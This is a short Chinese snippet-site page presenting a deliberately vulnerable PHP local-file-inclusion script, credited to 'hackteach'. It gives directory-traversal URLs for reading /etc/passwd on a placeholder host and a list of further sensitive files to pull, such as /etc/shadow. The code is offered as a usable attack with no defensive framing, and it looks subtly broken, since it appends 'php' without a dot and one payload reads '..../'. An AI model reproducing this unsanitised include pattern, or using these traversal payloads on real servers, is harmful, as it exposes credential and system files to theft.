[宜配屋]听图阁

php 伪造本地文件包含漏洞的代码

yipeiwu_com4年前PHP代码库
代码:
复制代码 代码如下:

<?php
$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach
返回列表

上一篇:Python字符转换

下一篇:PHP生成静态页面详解

相关文章

php中preg_replace_callback函数简单用法示例

本文实例讲述了php中preg_replace_callback函数用法。分享给大家供大家参考,具体如下: mixed preg_replace_callback ( mixed pat...

请php正则走开

  好了,那么我出几个题,不用正则,看我怎么解决的。        1.清除HTML中所有的标签...

PHP Swoole异步读取、写入文件操作示例

PHP Swoole异步读取、写入文件操作示例

本文实例讲述了PHP Swoole异步读取、写入文件操作。分享给大家供大家参考,具体如下: 异步读取文件:swoole_async_readfile 异步写入文件:swoole_asyn...

PHP利用正则表达式将相对路径转成绝对路径的方法示例

前言 大家应该都有所体会,很多时候在做网络爬虫的时候特别需要将爬虫搜索到的超链接进行处理,统一都改成绝对路径的,所以本文就写了一个正则表达式来对搜索到的链接进行处理。下面话不多说,来看看...

PHP实现提取一个图像文件并在浏览器上显示的代码

去年做过一个项目,要把用户上传的图像文件列出文字清单,当用户点击一个文件名后,就可以显示这个图像. 因为要考虑兼容各种不同的图像格式, 我使用了GD库, 判断出具体是那种图像文件(MIN...

© YiPeiWu.com 【听图阁】 粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.